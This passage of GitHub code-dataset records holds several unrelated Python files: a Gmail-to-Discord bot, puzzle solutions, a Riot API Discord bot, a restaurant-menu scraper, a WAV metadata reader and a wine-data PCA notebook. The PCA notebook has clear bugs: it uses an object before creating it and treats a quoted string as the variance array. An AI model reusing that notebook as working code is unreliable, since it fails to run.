requests.post(webhook, json=part)\n return response\n\n\ndef split_message(message: str) -> List[str]:\n parts = []\n lines = message.split('\\n')\n part = ''\n for line in lines:\n if len(part + line) < 2000:\n part += line\n else:\n parts.append(part)\n part = line\n parts.append(part)\n return parts\n\n\n@tl.job(interval=timedelta(seconds=1800))\ndef main() -> None:\n with open('token.pickle', 'rb') as token:\n credentials = pickle.load(token)\n\n service = googleapiclient.discovery.build('gmail', 'v1', credentials=credentials)\n messages = get_new_pytricks(service)\n\n for message in messages:\n subject, content = get_content(message)\n log.info('Found new message', subject=subject)\n response = send_to_webhook(subject, content)\n\n if response.status_code == 204:\n log.info('Sent to discord', subject=subject)\n mark_as_read(service, message)\n else:\n log.error(f'Error while sending to Discord: {response.status_code} {response.content}')\n\n\nif __name__ == '__main__':\n tl.start(block=True)\n","repo_name":"meroupatate/pytricks-discord-bot","sub_path":"get_tricks.py","file_name":"get_tricks.py","file_ext":"py","file_size_in_byte":3426,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"10058154282","text":"with open(\"day03/inputs/input-part1.in\") as input_file:\n puzzle_input = input_file.read()\n\n\ndef format_binary_number(binary_number):\n return list(map(int, list(binary_number)))\n\n\nbinary_numbers = list(\n map(format_binary_number, puzzle_input.strip().split(\"\\n\")))\n\ndigit_frequencies = list(map(sum, zip(*binary_numbers)))\n\ngamma_rate = 0\nepsilon_rate = 0\n\nfor digit_frequency in digit_frequencies:\n most_common_digit = digit_frequency > len(binary_numbers) // 2\n\n gamma_rate *= 2\n epsilon_rate *= 2\n\n gamma_rate += most_common_digit\n epsilon_rate += not most_common_digit\n\nprint(gamma_rate * epsilon_rate)\n","repo_name":"TheNemPlayer/advent-of-code-2021","sub_path":"day03/solutions/solution-part1.py","file_name":"solution-part1.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"23353425480","text":"import requests\nimport config\nimport discord\nimport json\nfrom discord import app_commands\n\nintents = discord.Intents.all()\n\nclient = discord.Client(intents=intents)\n\ntree = 
app_commands.CommandTree(client)\n\n@client.event\nasync def on_ready():\n print('We have logged in as {0.user}'.format(client))\n\n@client.event\nasync def on_ready():\n await tree.sync(guild=discord.Object(id=719741641463824425))\n # print \"ready\" in the console when the bot is ready to work\n print(\"ready\")\n\n\n@client.event\nasync def on_message(message):\n if message.author == client.user:\n return\n \n msg = message.content\n\n if msg.startswith('$status'):\n response = requests.get(\"https://na1.api.riotgames.com/lol/status/v4/platform-data?api_key={}\".format(config.API_KEY))\n await message.channel.send(response)\n dict = response.json()\n \n # print(dict)\n\n# response = requests.get(\"https://na1.api.riotgames.com/lol/summoner/v4/summoners/by-name/sFzzz?api_key={}\".format(config.API_KEY))\n\n@tree.command(name = \"berate\", description = \"My first application Command\", guild=discord.Object(id=719741641463824425)) \nasync def first_command(interaction):\n await interaction.response.send_message(\"You're dogshit!\")\n\n@tree.command(name=\"name\", description=\"description\",guild=discord.Object(id=719741641463824425))\nasync def slash_command(interaction: discord.Interaction): \n \n await interaction.response.send_message(\"command\")\n\nclient.run(config.LPBOT_KEY)","repo_name":"bluo47/riotapi","sub_path":"lolapi.py","file_name":"lolapi.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"43165722017","text":"from datetime import date\nimport sys\n\nimport requests\nfrom bs4 import BeautifulSoup\n\n\ndef fix_for_html(text):\n '''\n HTML formatting of characters\n '''\n text = text.replace('ö', 'ö')\n text = text.replace('Ö', 'Ö')\n text = text.replace('å', 'å')\n text = text.replace('Å', 'Å')\n text = text.replace('ä', 'ä')\n text = text.replace('Ä', 'Ä')\n text = text.replace('é', 'é')\n text = text.replace('è', 'è')\n text = text.replace('í', 'í')\n text = text.replace('ì', 'ì')\n text = text.replace('à', 'à')\n text = text.replace('á', 'á')\n text = text.replace('ô', 'ô')\n text = text.replace('ü', 'ü')\n text = text.replace('Ä', 'Ä')\n text = text.replace('´', ''')\n text = text.replace('`', ''')\n text = text.replace('ç', 'ç')\n text = text.replace('”', '"')\n text = text.replace('è', 'è')\n text = text.replace('ä', 'ä')\n text = text.replace('Ö', 'Ä')\n text = text.replace('Ä', 'Ä')\n text = text.replace('ö', 'ö')\n text = text.replace('é', 'é')\n text = text.replace('Ã¥', 'å')\n text = text.replace('Å', 'Å')\n text = text.replace('â', '—')\n # Karolina\n text = text.replace('å', 'å')\n text = text.replace('ä', 'ä')\n text = text.replace('ö', 'ö')\n text = text.replace('Ä', 'Ä')\n\n text = text.strip()\n\n return text\n\n\n### date management start ###\ndef get_day():\n '''\n Today as digit\n '''\n return date.today().day\n\n\ndef get_monthdigit():\n '''\n Month as digit\n '''\n return date.today().month\n\n\ndef get_month():\n '''\n Month name\n '''\n months = {1: 'januari', 2: 'februari', 3: 'mars', 4: 'april',\n 5: 'maj', 6: 'juni', 7: 'juli', 8: 'augusti',\n 9: 'september', 10: 'oktober', 11: 'november', 12: 'december'}\n\n return months[get_monthdigit()]\n\n\ndef get_week():\n '''\n Week number\n '''\n return date.today().isocalendar()[1]\n\n\ndef get_weekday(lang='sv', tomorrow=False):\n '''\n Day name in swedish(sv) or english (en)\n '''\n wdigit = get_weekdigit()\n if tomorrow:\n wdigit += 1\n if lang == 'sv':\n weekdays = {0: 'måndag', 1: 'tisdag', 2: 
'onsdag', 3: 'torsdag',\n 4: 'fredag', 5: 'lördag', 6: 'söndag', 7: 'måndag'}\n if lang == 'en':\n weekdays = {0: 'monday', 1: 'tuesday', 2: 'wednesday', 3: 'thursday',\n 4: 'friday', 5: 'saturday', 6: 'sunday', 7: 'monday'}\n return weekdays[wdigit]\n\n\ndef get_weekdigit():\n '''\n Get digit for week (monday = 0)\n '''\n return date.today().weekday()\n\n\ndef get_year():\n '''\n Year as number\n '''\n return date.today().year\n### date management end ###\n\n### parsers start ###\ndef parse_bikupan(resdata):\n '''\n Parse the menu of Restaurang Bikupan\n '''\n lines = list()\n lines += restaurant_start(fix_for_html(resdata[1]), 'Uppsala',\n resdata[2], resdata[4])\n\n page_req = requests.get(resdata[3])\n if page_req.status_code != 200:\n raise IOError('Bad HTTP responce code')\n\n soup = BeautifulSoup(page_req.text, 'html.parser')\n relevant = soup.find(\"div\", {\"class\": \"col-md-3 hors-menu text-center\"})\n dishes = relevant.find_all(\"div\", {\"class\": \"col-xs-10 text-left\"})\n for dish in dishes:\n lines.append(dish.get_text().strip().replace('\\n', ' ') + '<br/>')\n lines += restaurant_end()\n return lines\n\n\ndef parse_dufva(resdata):\n '''\n Parse the menu of Sven Dufva\n '''\n lines = list()\n lines += restaurant_start(fix_for_html(resdata[1]), 'Uppsala',\n resdata[2], resdata[4])\n\n page_req = requests.get(resdata[3])\n if page_req.status_code != 200:\n raise IOError('Bad HTTP responce code')\n\n soup = BeautifulSoup(page_req.text, 'html.parser')\n relevant = soup.find(\"div\", {\"id\": \"post\"})\n menu_lines = relevant.get_text().split('\\n')\n dag = get_weekday()\n started = False\n for line in menu_lines:\n if not line:\n continue\n if line.lower() == dag:\n started = True\n continue\n if started:\n if line[0] != '-':\n lines.append(line.strip() + '<br/>')\n else:\n break\n lines += restaurant_end()\n return lines\n\n\ndef parse_glada(resdata):\n '''\n Parse the menu of Glada restaurangen\n '''\n lines = list()\n lines += restaurant_start(fix_for_html(resdata[1]), 'Solna',\n resdata[2], resdata[4])\n\n # No way I'll parse this one. 
If anyone actually wants to, I'd be happy to accept a patch.\n\n lines += restaurant_end()\n return lines\n\n\ndef parse_haga(resdata):\n '''\n Print a link to the menu of Haga gatukök\n '''\n lines = list()\n lines += restaurant_start(fix_for_html(resdata[1]), 'Solna',\n resdata[2], resdata[4])\n lines += restaurant_end()\n return lines\n\n\ndef parse_hjulet(resdata):\n '''\n Parse the menu of Restaurang Hjulet\n '''\n lines = list()\n lines += restaurant_start(fix_for_html(resdata[1]), 'Solna',\n resdata[2], resdata[4])\n try:\n page_req = requests.get(resdata[3])\n if page_req.status_code != 200:\n raise IOError('Bad HTTP responce code')\n\n soup = BeautifulSoup(page_req.text, 'html.parser')\n days = soup.find('table', {'class':'table lunch_menu animation'})\n dishes = days.find('td', {'class':'td_title'})\n lines.append(dishes.get_text().strip().replace('\\n', '<br/>'))\n except Exception as err:\n sys.stderr.write(err)\n lines += restaurant_end()\n\n return lines\n\n\ndef parse_hubben(resdata):\n '''\n Parse the menu of Restaurang Hubben\n '''\n lines = list()\n lines += restaurant_start(fix_for_html(resdata[1]), 'Uppsala',\n resdata[2], resdata[4])\n\n page_req = requests.get(resdata[3])\n if page_req.status_code != 200:\n raise IOError('Bad HTTP responce code')\n\n soup = BeautifulSoup(page_req.text, 'html.parser')\n days = soup.find_all(\"div\", {\"class\": \"day\"})\n current = days[get_weekdigit()]\n dishes = current.find_all('div', {'class': 'element description col-md-4 col-print-5'})\n for dish in dishes:\n lines.append(dish.get_text().strip().replace('\\n', ' ') + '<br/>')\n lines += restaurant_end()\n return lines\n\n\ndef parse_jons(resdata):\n '''\n Parse the menu of Jöns Jacob\n '''\n lines = list()\n lines += restaurant_start(fix_for_html(resdata[1]), 'Solna',\n resdata[2], resdata[4])\n\n page_req = requests.get(resdata[3])\n if page_req.status_code != 200:\n raise IOError('Bad HTTP responce code')\n\n soup = BeautifulSoup(page_req.text, 'html.parser')\n days = soup.find('table', {'class':'table lunch_menu animation'})\n day = days.find('tbody', {'class':'lunch-day-content'})\n dishes = day.find_all('td', {'class':'td_title'})\n for dish in dishes:\n lines.append(dish.get_text().strip().split('\\n')[1] + '<br/>')\n\n lines += restaurant_end()\n return lines\n\n\ndef parse_jorpes(resdata):\n '''\n Parse the menu of Resturang Jorpes\n '''\n lines = list()\n lines += restaurant_start(fix_for_html(resdata[1]), 'Solna',\n resdata[2], resdata[4])\n lines += restaurant_end()\n return lines\n\n\ndef parse_karolina(resdata):\n '''\n Parse the menu of Restaurang Karolina\n '''\n lines = list()\n lines += restaurant_start(fix_for_html(resdata[1]), 'Solna',\n resdata[2], resdata[4])\n\n try:\n page_req = requests.get(resdata[3])\n if page_req.status_code != 200:\n raise IOError('Bad HTTP responce code')\n\n soup = BeautifulSoup(page_req.text, 'html.parser')\n days = soup.find('table', {'class':'table lunch_menu animation'})\n day = days.find('tbody', {'class':'lunch-day-content'})\n dishes = day.find_all('td', {'class':'td_title'})\n for dish in dishes:\n lines.append(dish.get_text().strip().split(':')[1] + '<br/>')\n\n except Exception as err:\n sys.stderr.write(err)\n\n lines += restaurant_end()\n return lines\n\n\ndef parse_livet(resdata):\n '''\n Parse the menu of Livet [restaurant]\n '''\n lines = list()\n lines += restaurant_start(fix_for_html(resdata[1]), 'Solna',\n resdata[2], resdata[4])\n\n try:\n page_req = requests.get(resdata[3])\n if page_req.status_code != 200:\n 
raise IOError('Bad HTTP responce code')\n\n soup = BeautifulSoup(page_req.text, 'html.parser')\n days = soup.find('div', {'class':'property--xhtml-string'})\n started = False\n for row in days.find_all('p'):\n if get_weekday() in row.get_text().lower():\n started = True\n continue\n if get_weekday(tomorrow=True) in row.get_text().lower():\n break\n if started:\n dish = row.find('b')\n dish_text = dish.get_text().replace('\\xa0', '')\n if dish_text:\n lines.append(dish_text + '<br/>')\n\n\n except Exception as err:\n sys.stderr.write('E: Livet: {}'.format(err))\n\n lines += restaurant_end()\n return lines\n\n\ndef parse_mollan(resdata):\n '''\n Parse the menu of Mollan\n '''\n lines = list()\n lines += restaurant_start(fix_for_html(resdata[1]), 'Solna',\n resdata[2], resdata[4])\n\n # To be fixed some day. Not fun.\n page_req = requests.get(resdata[3])\n if page_req.status_code != 200:\n raise IOError('Bad HTTP responce code')\n soup = BeautifulSoup(page_req.text, 'html.parser')\n relevant = soup.find_all('span', {'class': 'mobile-undersized-upper'})\n wday = fix_for_html(get_weekday())\n started = False\n for tag in relevant:\n if 'bold' in tag['style']:\n if wday in tag.get_text().lower():\n started = True\n continue\n if started:\n break\n if started:\n lines.append(fix_for_html(tag.get_text()) + '<br/>')\n\n lines += restaurant_end()\n\n return lines\n\n\ndef parse_nanna(resdata):\n '''\n Parse the menu of Nanna Svartz\n '''\n lines = list()\n lines += restaurant_start(fix_for_html(resdata[1]), 'Solna',\n resdata[2], resdata[4])\n\n # will fix some day. Not fun.\n #page_req = requests.get(resdata[3])\n #if page_req.status_code != 200:\n # raise IOError('Bad HTTP responce code')\n\n lines += restaurant_end()\n return lines\n\n\ndef parse_rudbeck(resdata):\n '''\n Parse the menu of Bistro Rudbeck\n '''\n lines = list()\n lines += restaurant_start(fix_for_html(resdata[1]), 'Solna',\n resdata[2], resdata[4])\n\n page_req = requests.get(resdata[3])\n if page_req.status_code != 200:\n raise IOError('Bad HTTP responce code')\n\n soup = BeautifulSoup(page_req.text, 'html.parser')\n days = soup.find_all('div', {'class':'container-fluid no-print'})\n day = days[get_weekdigit()]\n dishes = day.find_all('span')[3:]\n for dish in dishes:\n lines.append(dish.get_text().strip() + '<br/>')\n\n lines += restaurant_end()\n return lines\n\n\ndef parse_subway(resdata):\n '''\n Print info about Subway\n '''\n lines = list()\n lines += restaurant_start(fix_for_html(resdata[1]), 'Solna',\n resdata[2], resdata[4])\n lines += restaurant_end()\n return lines\n\n\ndef parse_svarta(resdata):\n '''\n Parse the menu of Svarta Räfven\n '''\n lines = list()\n lines += restaurant_start(fix_for_html(resdata[1]), 'Solna',\n resdata[2], resdata[4])\n\n # page_req = requests.get(resdata[3])\n # soup = BeautifulSoup(page_req.text, 'html.parser')\n\n lines += restaurant_end()\n return lines\n\n### parsers end ###\n\ndef restaurant_end():\n '''\n Finish the tags after the listing of the menu of a restaurant\n '''\n lines = list()\n lines.append('</p>')\n lines.append('</div>')\n return lines\n\n\ndef restaurant_start(restaurant, location, home_url, mapurl):\n ''''\n Start the listing of the menu of a restaurant\n '''\n lines = list()\n lines.append('<!--{}-->'.format(restaurant))\n lines.append('<div class=\"title\"><a href=\"{url}\"> {rest}</a>'.format(rest=restaurant,\n url=home_url) +\n ' (<a href=\"{murl}\">{loc}</a>)</div>'.format(loc=location,\n murl=mapurl))\n lines.append('<div class=\"menu\">')\n 
lines.append('<p>')\n return lines\n","repo_name":"viklund/lunch-menu","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":12980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"81"} +{"seq_id":"37806717388","text":"import array as arr\n\nx = arr.array('i', [1,2,3,4,5,6])\n\n\"\"\"\nTypes for an array is derived from C language\n\ni -> integer -> 2 byte\nf -> float -> decimal -> 4 byte\nd -> double -> decimal -> 8 byte\n\"\"\"\n\nfor i in range(0, len(x)):\n\tprint(x[i])\n\nprint(x, type(x), len(x))\n\nx[0] = 0 # update an element\n\nx.append(-3)\nx.insert(1, 99)\nfor i in range(0, len(x)):\n\tprint(x[i])\n\n# slicing\n\ny = x[1:5]\nfor i in range(0, len(y)):\n\tprint(y[i])\n","repo_name":"singhsanket143/Unacademy_Pec_Python","sub_path":"arraysinpython.py","file_name":"arraysinpython.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"81"} +{"seq_id":"19365904071","text":"\"\"\"\nRead meta data and cue lists from wave files.\n\n- `metadata_wave()`: read metadata of a wave file.\n\n\n## Documentation of wave file format\n\nFor wave chunks see:\n\n- https://sites.google.com/site/musicgapi/technical-documents/wav-file-format#cue\n- http://fhein.users.ak.tu-berlin.de/Alias/Studio/ProTools/audio-formate/wav/overview.html\n- http://www.gallery.co.uk/ixml/\n\nFor tag names see:\n\n- see https://exiftool.org/TagNames/RIFF.html#Info%20for%20valid%20info%20tags\n\"\"\"\n\nimport struct\nimport xml.etree.ElementTree as ET\n\n\n# see https://exiftool.org/TagNames/RIFF.html#Info%20for%20valid%20info%20tags\ninfo_tags = dict(AGES='Rated',\n CMNT='Comment',\n CODE='EncodedBy',\n DTIM='DateTimeOriginal',\n GENR='Genre',\n IART='Artist',\n ICMT='Comment',\n ICNT='Country',\n ICOP='Copyright',\n ICRD='DateCreated',\n IDIT='DateTimeOriginal',\n IENC='EncodedBy',\n IENG='Engineer',\n IGNR='Genre',\n IKEY='Keywords',\n ILNG='Language',\n IMIT='MoreInfoText',\n IMIU='MoreInfoURL',\n IMUS='MusicBy',\n INAM='Title',\n IPRD='Product',\n IRTD='Rating',\n ISBJ='Subject',\n ISFT='Software',\n ISRC='Source',\n ITCH='Technician',\n ITRK='TrackNumber',\n IWRI='WrittenBy',\n LANG='Language',\n LOCA='Location',\n TAPE='TapeName',\n TITL='Title',\n TLEN='Length',\n TRCK='TrackNumber',\n TVER='Version',\n YEAR='Year',\n IBRD='uCBoard',\n IMAC='MACAdress')\n\n\ndef metadata_wave(file, store_empty=False, verbose=0):\n \"\"\" Read metadata of a wave file.\n\n Parameters\n ----------\n file: string or file handle\n The wave file.\n store_empty: bool\n If `False` do not add meta data with empty values.\n verbose: int\n Verbosity level.\n\n Returns\n -------\n meta_data: nested dict\n Meta data contained in the wave file. Keys of the nested\n dictionaries are always strings. If the corresponding\n values are dictionaries, then the key is the section name\n of the metadata contained in the dictionary. All other\n types of values are values for the respective key. In\n particular they are strings, or list of strings. But other\n simple types like ints or floats are also allowed.\n First level contains sections of meta data\n (keys 'INFO' or 'BEXT', values are dictionaries).\n cues: list of dict\n Cues contained in the wave file. 
Each item in the list provides\n - 'id': Id of the cue.\n - 'pos': Position of the cue in samples.\n - 'length': Number of samples the cue covers (optional, from PLST or LTXT chunk).\n - 'repeats': How often the cue segment should be repeated (optional, from PLST chunk).\n - 'label': Label of the cue (optional, from LABL chunk).\n - 'note': Note on the cue (optional, from NOTE chunk).\n - 'text': Description of cue segment (optional, from LTXT chunk).\n\n Raises\n ------\n ValueError\n Not a wave file.\n \"\"\"\n\n def riff_chunk(sf):\n \"\"\" Read and check the RIFF file header. \"\"\"\n str1 = sf.read(4).decode('latin-1')\n if str1 != 'RIFF':\n raise ValueError(\"Not a wave file.\")\n fsize = struct.unpack('<I', sf.read(4))[0] + 8\n str2 = sf.read(4).decode('latin-1')\n if str2 != 'WAVE':\n raise ValueError(\"Not a wave file.\")\n return fsize\n\n def skip_chunk(sf):\n \"\"\" Skip over unknown chunk. \"\"\"\n data = sf.read(4)\n size = struct.unpack('<I', data)[0]\n size += size % 2 \n sf.seek(size, 1)\n\n def cue_chunk(sf, cues):\n \"\"\" Read in cue ids and positions from cue chunk. \"\"\"\n size, n = struct.unpack('<II', sf.read(8))\n for c in range(n):\n id, pos = struct.unpack('<II', sf.read(8))\n datachunkid = sf.read(4).decode('latin-1').rstrip(' \\x00').upper()\n chunkstart, blockstart, offset = struct.unpack('<III', sf.read(12))\n c = dict(id=id, pos=pos)\n cues.append(c)\n\n def playlist_chunk(sf, cues):\n \"\"\" Read in cue length and repeats from playlist chunk. \"\"\"\n size, n = struct.unpack('<II', sf.read(8))\n for p in range(n):\n id, length, repeats = struct.unpack('<III', sf.read(12))\n for c in cues:\n if c['id'] == id:\n c['length'] = length\n c['repeats'] = repeats\n break\n\n def info_chunks(sf, list_size, store_empty):\n \"\"\" Read in meta data from info list chunk. \"\"\"\n md = {}\n while list_size >= 8:\n key = sf.read(4).decode('latin-1').rstrip(' \\x00')\n size = struct.unpack('<I', sf.read(4))[0]\n size += size % 2\n value = sf.read(size).decode('latin-1').rstrip(' \\x00')\n list_size -= 8 + size\n if key in info_tags:\n key = info_tags[key]\n if value or store_empty:\n md[key] = value\n if list_size > 0:\n sf.seek(list_size, 1)\n return md\n\n def list_chunk(sf, cues, verbose=0):\n \"\"\" Read in list chunk. 
\"\"\"\n md = {}\n list_size = struct.unpack('<I', sf.read(4))[0]\n list_type = sf.read(4).decode('latin-1').upper()\n list_size -= 4\n if list_type == 'INFO':\n md = info_chunks(sf, list_size, store_empty)\n elif list_type == 'ADTL':\n while list_size >= 8:\n key = sf.read(4).decode('latin-1').rstrip(' \\x00').upper()\n size, id = struct.unpack('<II', sf.read(8))\n size += size % 2 - 4\n if key == 'LABL':\n label = sf.read(size).decode('latin-1').rstrip(' \\x00')\n for c in cues:\n if c['id'] == id:\n c['label'] = label\n break\n elif key == 'NOTE':\n note = sf.read(size).decode('latin-1').rstrip(' \\x00')\n for c in cues:\n if c['id'] == id:\n c['note'] = note\n break\n elif key == 'LTXT':\n length = struct.unpack('<I', sf.read(4))[0]\n sf.read(12)\n text = sf.read(size - 4 - 12).decode('latin-1').rstrip(' \\x00')\n for c in cues:\n if c['id'] == id:\n c['length'] = length\n c['text'] = text\n break\n else:\n if verbose > 0:\n print(' skip', key, size, list_size)\n sf.read(size)\n list_size -= 12 + size\n if list_size > 0:\n sf.seek(list_size, 1)\n else:\n print('ERROR: unknown list type', list_type)\n return md\n\n def bext_chunk(sf, store_empty=True):\n \"\"\" Read in meta-data from the broadcast-audio extension chunk.\n\n See https://tech.ebu.ch/docs/tech/tech3285.pdf for specifications.\n\n Returns\n -------\n meta_data: dict\n - 'Description': a free description of the sequence.\n - 'Originator': name of the originator/ producer of the audio file.\n - 'OriginatorReference': unambiguous reference allocated by the originating organisation.\n - 'OriginationDate': date of creation of audio sequence in yyyy:mm:dd.\n - 'OriginationTime': time of creation of audio sequence in hh:mm:ss.\n - 'TimeReference': first sample since midnight.\n - 'Version': version of the BWF.\n - 'UMID': unique material identifier.\n - 'LoudnessValue': integrated loudness value.\n - 'LoudnessRange': loudness range.\n - 'MaxTruePeakLevel': maximum true peak value in dBTP.\n - 'MaxMomentaryLoudness': highest value of the momentary loudness level.\n - 'MaxShortTermLoudness': highest value of the short-term loudness level.\n - 'Reserved': 180 bytes reserved for extension.\n - 'CodingHistory': description of coding processed applied to the audio data.\n \"\"\"\n md = {}\n size = struct.unpack('<I', sf.read(4))[0]\n size += size % 2\n s = sf.read(256).decode('latin-1').rstrip(' \\x00')\n if s or store_empty:\n md['Description'] = s\n s = sf.read(32).decode('latin-1').rstrip(' \\x00')\n if s or store_empty:\n md['Originator'] = s\n s = sf.read(32).decode('latin-1').rstrip(' \\x00')\n if s or store_empty:\n md['OriginatorReference'] = s\n s = sf.read(10).decode('latin-1').rstrip(' \\x00')\n if s or store_empty:\n md['OriginationDate'] = s\n s = sf.read(8).decode('latin-1').rstrip(' \\x00')\n if s or store_empty:\n md['OriginationTime'] = s\n reference, version = struct.unpack('<QH', sf.read(10))\n if reference > 0 or store_empty:\n md['TimeReference'] = reference\n if version > 0 or store_empty:\n md['Version'] = version\n s = sf.read(64).decode('latin-1').rstrip(' \\x00')\n if s or store_empty:\n md['UMID'] = s\n lvalue, lrange, peak, momentary, shortterm = struct.unpack('<hhhhh', sf.read(10))\n if lvalue > 0 or store_empty:\n md['LoudnessValue'] = lvalue\n if lrange > 0 or store_empty:\n md['LoudnessRange'] = lrange\n if peak > 0 or store_empty:\n md['MaxTruePeakLevel'] = peak\n if momentary > 0 or store_empty:\n md['MaxMomentaryLoudness'] = momentary\n if shortterm > 0 or store_empty:\n md['MaxShortTermLoudness'] = 
shortterm\n s = sf.read(180).decode('latin-1').rstrip(' \\x00')\n if s or store_empty:\n md['Reserved'] = s\n size -= 256 + 32 + 32 + 10 + 8 + 8 + 2 + 64 + 10 + 180\n s = sf.read(size).decode('latin-1').rstrip(' \\x00')\n if s or store_empty:\n md['CodingHistory'] = s\n return md\n\n def parse_xml(element):\n md = {}\n for e in element:\n if not e.text is None:\n md[e.tag] = e.text\n elif len(e.getchildren()) > 0:\n md[e.tag] = parse_xml(e)\n elif store_empty:\n md[e.tag] = ''\n return md\n\n def ixml_chunk(sf):\n size = struct.unpack('<I', sf.read(4))[0]\n size += size % 2\n xmls = sf.read(size).decode('latin-1').rstrip(' \\x00')\n root = ET.fromstring(xmls)\n md = {root.tag: parse_xml(root)}\n return md\n \n meta_data = {}\n cues = []\n sf = file\n file_pos = None\n if hasattr(file, 'read'):\n file_pos = sf.tell()\n sf.seek(0, 0)\n else:\n sf = open(file, 'rb')\n fsize = riff_chunk(sf)\n while (sf.tell() < fsize - 8):\n chunk = sf.read(4).decode('latin-1').upper()\n if chunk == 'LIST':\n md = list_chunk(sf, cues, verbose)\n if len(md) > 0:\n meta_data['INFO'] = md\n elif chunk == 'CUE ':\n cue_chunk(sf, cues)\n elif chunk == 'PLST':\n playlist_chunk(sf, cues)\n elif chunk == 'BEXT':\n md = bext_chunk(sf, store_empty)\n meta_data['BEXT'] = md\n elif chunk == 'IXML':\n md = ixml_chunk(sf)\n meta_data['IXML'] = md\n else:\n if verbose > 0:\n print('skip', chunk)\n skip_chunk(sf)\n if verbose > 1:\n print(f' file size={fsize}, file position={sf.tell()}')\n if file_pos is None:\n sf.close()\n else:\n sf.seek(file_pos, 0)\n return meta_data, cues\n\n\n\ndef main(args):\n \"\"\"Call demo with command line arguments.\n\n Parameters\n ----------\n args: list of strings\n Command line arguments as provided by sys.argv\n \"\"\"\n if len(args) <= 1 or args[1] == '-h' or args[1] == '--help':\n print('')\n print('Usage:')\n print(' python -m audioio.wavemetadata [--help] <audio/file.wav>')\n return\n\n # read meta data:\n meta_data, cues = metadata_wave(args[1], store_empty=False, verbose=1)\n \n # print meta data:\n print()\n print('meta data:')\n for sk in meta_data:\n md = meta_data[sk]\n if isinstance(md, dict):\n print(f'{sk}:')\n for k in md:\n print(f' {k:22}: {md[k]}')\n else:\n print(f'{sk}:\\n {md}')\n \n # print cue table:\n if len(cues) > 0:\n print()\n print(f'{\"cue\":4} {\"position\":10} {\"length\":8} {\"label\":10} {\"note\":10} {\"text\":10}')\n for c in cues:\n print(f'{c[\"id\"]:4} {c[\"pos\"]:10} {c.get(\"length\", 0):8} {c.get(\"label\", \"\"):10} {c.get(\"note\", \"\"):10} {c.get(\"text\", \"\"):10}')\n\n\nif __name__ == \"__main__\":\n import sys\n main(sys.argv)\n","repo_name":"bendalab/audioio","sub_path":"audioio/wavemetadata.py","file_name":"wavemetadata.py","file_ext":"py","file_size_in_byte":13422,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"31392377586","text":"class Solution:\n def leastInterval(self, tasks: List[str], n: int) -> int:\n v, t, mx, idx = [0 for i in range(26)], 0, 0, 0\n for c in tasks:\n idx=ord(c)-ord('A')\n v[idx]+=1\n mx=max(mx,v[idx])\n for i in range(26):\n if mx==v[i]:\n t+=1\n return max(t+(mx-1)*(n+1),len(tasks))","repo_name":"jitaeyun/algorithm","sub_path":"leetcode/Python/task-scheduler.py","file_name":"task-scheduler.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"24976391245","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n# Importing Libraries\nimport 
pandas as pd \nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.decomposition import PCA\nfrom sklearn.preprocessing import scale\n\n\n# In[3]:\n\n\n# Loading dataset and Renaming the columns based on their features.\ncolumns = ['class','alcohol', 'malic_acid', 'ash', 'alcalinity_of_ash', 'magnesium',\n 'total_phenols', 'flavanoids', 'nonflavanoid_phenols',\n 'proanthocyanins', 'color_intensity', 'hue',\n 'dilution_of_wines', 'proline']\n\ndf = pd.read_csv('wine.csv', names=columns, header=0)\ndf.head()\n\n\n# In[4]:\n\n\n# EDA & Data Preprocessing\ndf.info()\n\n\n# In[5]:\n\n\n# Checking for null values\ndf.isna().sum()\n\n\n# In[6]:\n\n\n# Checking predefined no.of cluster\ndf['class'].nunique()\n\n\n# In[7]:\n\n\n#Plot for class\ndf[\"class\"].value_counts().plot.bar(color='Red')\nplt.xlabel(\"Class\")\nplt.legend()\n\n\n# In[8]:\n\n\n# Using the standard scaler method to get the values converted into integers.\nX = df.iloc[:, 1:].values\nfrom sklearn.preprocessing import StandardScaler\nX_normal = scale(X)\n\n\n# In[9]:\n\n\nX_normal.shape\n\n\n# In[10]:\n\n\nX_normal\n\n\n# In[14]:\n\n\n#Building PCA\n''' Using Principal Component Analysis or PCA in short to reduce the dimensionality of the data in order to optimize the result \nof the clustering. '''\nprincipalComponents = pca.fit_transform(X_normal)\npca = PCA()\n\n\n# In[15]:\n\n\nprincipalComponents\n\n\n# In[16]:\n\n\n# Creating a dataframe featuring the two Principal components that we acquired through PCA.\nPCA_dataset = pd.DataFrame(data = principalComponents, columns = ['component1', 'component2', 'component3', 'component4', \n 'component5', 'component6','component7', 'component8', 'component9',\n 'component10', 'component11', 'component12', 'component13'] )\nPCA_dataset.head()\n\n\n# In[28]:\n\n\n# The amount of variance that each PCA explains is \nvar = 'pca.explained_variance_ratio_'\nvar\n\n\n# In[ ]:\n\n\n\n\n\n# In[37]:\n\n\n# Cumulative variance\nvar1 = np.cumsum(np.round(var,decimals = 4)*100)\nvar1\n\n\n# In[35]:\n\n\n'pca.components'\n\n\n# In[36]:\n\n\n# Variance plot for PCA components obtained \nplt.plot(var1,color=\"red\")\n\n\n# In[38]:\n\n\nprincipal_component1 = PCA_dataset['component1']\nprincipal_component2 = PCA_dataset['component2']\nprincipal_component3 = PCA_dataset['component3']\n\n\n# In[39]:\n\n\n# Creating dataframe for further clusering algorithms\npca_df = pd.concat([principal_component1, principal_component2, principal_component3], axis = 1)\npca_df.head()\n\n\n# In[40]:\n\n\n# Visualizing the results of the 3D PCA.\nax = plt.figure(figsize=(10,10)).gca(projection='3d')\nplt.title('3D Principal Component Analysis (PCA)')\nax.scatter(\n xs=principal_component1, \n ys=principal_component2, \n zs=principal_component3, 